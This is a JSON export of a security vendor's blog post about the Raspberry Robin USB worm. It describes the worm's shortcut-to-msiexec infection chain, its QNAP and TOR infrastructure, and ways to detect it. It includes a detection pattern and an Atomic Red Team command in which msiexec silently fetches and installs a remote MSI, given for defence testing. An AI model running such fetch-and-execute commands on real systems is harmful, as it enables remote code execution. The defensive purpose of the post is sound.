{"id":7065,"date":"2023-09-19T09:51:13","date_gmt":"2023-09-19T09:51:13","guid":{"rendered":"https:\/\/fortgale.com\/blog\/?p=7065"},"modified":"2023-09-21T16:45:56","modified_gmt":"2023-09-21T16:45:56","slug":"raspberry-robin-how-to-defend","status":"publish","type":"post","link":"https:\/\/fortgale.com\/blog\/uncategorized-it\/raspberry-robin-how-to-defend\/","title":{"rendered":"Raspberry Robin: How to defend"},"content":{"rendered":"\n<div class=\"wp-block-media-text alignwide is-stacked-on-mobile\"><figure class=\"wp-block-media-text__media\"><img decoding=\"async\" width=\"467\" height=\"466\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2022\/09\/raspberryrobinfortgale.png\" alt=\"\" class=\"wp-image-4811 size-full\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/raspberryrobinfortgale.png 467w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/raspberryrobinfortgale-300x300.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/raspberryrobinfortgale-150x150.png 150w\" sizes=\"(max-width: 467px) 100vw, 467px\" loading=\"lazy\" \/><\/figure><div class=\"wp-block-media-text__content\">\n<p>In May 2022, a new, particularly evasive Worm was observed for the first time, spreading in private and corporate networks through <strong>compromised USB sticks.<br><\/strong>This new Worm has been given the name &#8220;<strong><em>Raspberry Robin<\/em><\/strong>&#8221;.<\/p>\n<\/div><\/div>\n\n\n\n<p>Worms that propagate through USB devices are certainly not a new threat, and because they are often old malware their command and control infrastructure is frequently<em> offline.<\/em><\/p>\n\n\n\n<p>Raspberry Robin, on the other hand, is a real threat to the security of companies because:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>it is actively operated by criminals;<\/li>\n\n\n\n<li>it uses a sophisticated compromise chain for defense evasion;<\/li>\n\n\n\n<li>it is used as a bridge for 
<strong>Ransomware-type attacks<\/strong> (<a href=\"https:\/\/www.microsoft.com\/security\/blog\/2022\/05\/09\/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself\/#DEV-0206-DEV-0243\" target=\"_blank\" rel=\"noreferrer noopener\"><em>source<\/em><\/a>);<\/li>\n\n\n\n<li>it uses compromised <strong>QNAP<\/strong> systems as <strong>C2 infrastructure<\/strong> and the <strong>TOR<\/strong> (The Onion Routing) network.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-preventing-a-compromission\">Preventing a Compromise<\/h2>\n\n\n\n<p>As previously mentioned, the malware enters the infrastructure through an <strong>initial compromise<\/strong> of a workstation via a <strong>USB device.<\/strong><\/p>\n\n\n\n<div class=\"wp-block-media-text alignwide has-media-on-the-right is-stacked-on-mobile\" style=\"grid-template-columns:auto 15%\"><div class=\"wp-block-media-text__content\">\n<p><strong>When opening the USB device, the victim is shown a classic Windows shortcut:<\/strong><\/p>\n<\/div><figure class=\"wp-block-media-text__media\"><img decoding=\"async\" width=\"156\" height=\"169\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2022\/09\/image-1.png\" alt=\"Link per avvio compromissione Raspberry Robin\" class=\"wp-image-4776 size-full\" loading=\"lazy\" \/><\/figure><\/div>\n\n\n\n<p>Double-clicking it starts the compromise chain: the destination folder opens normally on screen while, at the same time, a series of malicious commands is launched:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"975\" height=\"211\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2022\/09\/image-10.png\" alt=\"Cosa succede durante l'avvio della catena di compromissione del malware Raspberry Robin\" class=\"wp-image-4807\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-10.png 975w, 
https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-10-300x65.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-10-768x166.png 768w\" sizes=\"(max-width: 975px) 100vw, 975px\" loading=\"lazy\" \/><\/figure>\n\n\n\n<p>The first malicious command acts as a <em><strong>Downloader<\/strong><\/em>: it is the step that actually retrieves the <em>Raspberry Robin<\/em> malware:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2022\/09\/image-3-1024x32.png\" alt=\"Evidenza tecnica dell'esecuzione di comandi malevoli da cui proteggersi\" class=\"wp-image-4779\" style=\"width:840px;height:26px\" width=\"840\" height=\"26\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-3-1024x32.png 1024w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-3-300x9.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-3-768x24.png 768w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-3-1536x48.png 1536w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-3.png 1808w\" sizes=\"(max-width: 840px) 100vw, 840px\" loading=\"lazy\" \/><\/figure>\n\n\n\n<p>A peculiarity of the malware is its use of previously compromised <strong>QNAP servers<\/strong> to distribute the final malicious payload.<\/p>\n\n\n\n<p>At this point, downloading the final payload completes the compromise phase, and communications with the command and control server begin, typically over the<strong> TOR <\/strong>(<em>The Onion Routing<\/em>) network:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"746\" height=\"189\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2022\/09\/image-4.png\" alt=\"Grafico semplificato della catena di 
compromissione Raspberry Robin\" class=\"wp-image-4780\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-4.png 746w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-4-300x76.png 300w\" sizes=\"(max-width: 746px) 100vw, 746px\" loading=\"lazy\" \/><figcaption class=\"wp-element-caption\">Compromise chain &#8211; <a href=\"https:\/\/blogs.cisco.com\/security\/raspberry-robin-highly-evasive-worm-spreads-over-external-disks\" target=\"_blank\" rel=\"noreferrer noopener\">source<\/a><\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Threat Detection Methods<\/h2>\n\n\n\n<p>An infrastructure can be defended against a Raspberry Robin compromise at several levels.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Endpoint Security<\/h3>\n\n\n\n<p>With visibility into all enterprise systems, you can identify this type of compromise by detecting the execution of suspicious commands. In this case, an <strong>msiexec<\/strong> process whose command line contains the <strong>http<\/strong> keyword could be a first alarm bell.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Testing defence:<\/h4>\n\n\n\n<p>The offensive activity can be simulated, in order to test the actual defensive capability of the systems against this kind of compromise, by launching the following command (<a href=\"https:\/\/github.com\/redcanaryco\/atomic-red-team\/blob\/master\/atomics\/T1218.007\/T1218.007.md#atomic-test-11---msiexecexe---execute-remote-msi-file\" target=\"_blank\" rel=\"noreferrer noopener\">Atomic Red Team test<\/a>):<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>msiexec.exe \/q \/i \"https:\/\/github.com\/redcanaryco\/atomic-red-team\/raw\/master\/atomics\/T1218.007\/src\/T1218.007_JScript.msi\"\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Network and Intelligence Feed<\/h3>\n\n\n\n<p>It is possible to identify a compromise from Raspberry Robin 
malware and similar threats using information acquired from the company&#8217;s network, following two different approaches:<\/p>\n\n\n\n<p><strong>Use of Intrusion Detection Systems:<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\" id=\"block-01315421-64a0-452d-871a-344848c202d0\">\n<li>if correctly configured, the IDS should have rules that identify malicious traffic by inspecting communications with the C2.<\/li>\n<\/ul>\n\n\n\n<p><strong>Use of Intelligence Feeds:<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>leverage information from intelligence feeds on malware and attacker infrastructure: correlating the observed IP addresses and domains against the feed is enough to identify anomalous traffic.<\/li>\n<\/ul>\n\n\n\n<p><strong>Attention! In this case, from a defensive point of view, the threat is identified post-compromise: the system is already compromised, and the information on the victim system may already be affected.<\/strong><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Fortgale Defence<\/h2>\n\n\n\n<p>Fortgale takes care of securing companies from these types of cyber threats and compromises! 
From defense against Malware attacks (Ransomware, Worms, Trojans and Spyware) to compromises of perimeter systems through application and system vulnerabilities.<\/p>\n\n\n\n<p>We identify attackers from the first moment they try to take their first steps into the Company&#8217;s systems and networks.<\/p>\n\n\n\n<p>With specialist services designed for different company characteristics, we can intervene on different aspects of defence.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Contact: info@fortgale.com<\/h2>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/fortgale.com\/mdr\/\"><img decoding=\"async\" width=\"1024\" height=\"428\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2022\/09\/image-6-1024x428.png\" alt=\"La lista dei principali servizi Difensifi di Fortgale\" class=\"wp-image-4784\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-6-1024x428.png 1024w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-6-300x125.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-6-768x321.png 768w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-6.png 1446w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" loading=\"lazy\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/fortgale.com\/xdr\/\"><img decoding=\"async\" width=\"1024\" height=\"390\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2022\/09\/image-7-1024x390.png\" alt=\"Le statistiche delle principali attivit\u00e0 svolte da Fortgale\" class=\"wp-image-4785\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-7-1024x390.png 1024w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-7-300x114.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-7-768x292.png 768w, 
https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-7.png 1072w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" loading=\"lazy\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/fortgale.com\/clienti\/\"><img decoding=\"async\" width=\"980\" height=\"488\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2022\/09\/image-8.png\" alt=\"I settori in cui operano i clienti Fortgale\" class=\"wp-image-4786\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-8.png 980w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-8-300x149.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-8-768x382.png 768w\" sizes=\"(max-width: 980px) 100vw, 980px\" loading=\"lazy\" \/><\/a><\/figure>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In May 2022, a new, particularly evasive Worm was observed for the first time, spreading in private and corporate networks through compromised USB sticks.This new Worm has been given the name &#8220;Raspberry Robin&#8220;. 
Worms that propagate through USB devices are certainly not new threats and very often, since they are old malware, command and control [&hellip;]<\/p>\n","protected":false},"author":12,"featured_media":5246,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[954],"tags":[],"class_list":["post-7065","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized-it"],"_links":{"self":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/7065","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/users\/12"}],"replies":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/comments?post=7065"}],"version-history":[{"count":5,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/7065\/revisions"}],"predecessor-version":[{"id":7076,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/7065\/revisions\/7076"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media\/5246"}],"wp:attachment":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media?parent=7065"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/categories?post=7065"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/tags?post=7065"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}